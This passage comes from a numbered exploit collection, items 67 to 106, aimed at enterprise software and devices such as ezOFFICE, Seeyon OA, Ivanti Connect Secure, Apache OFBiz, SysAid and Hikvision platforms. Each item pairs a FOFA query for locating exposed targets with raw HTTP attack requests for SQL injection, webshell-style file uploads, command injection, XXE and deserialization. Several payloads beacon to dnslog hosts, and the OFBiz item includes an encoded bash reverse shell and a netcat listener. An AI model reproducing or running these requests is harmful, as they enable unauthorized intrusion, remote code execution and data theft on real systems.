GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 mobile campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast盈可视 HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
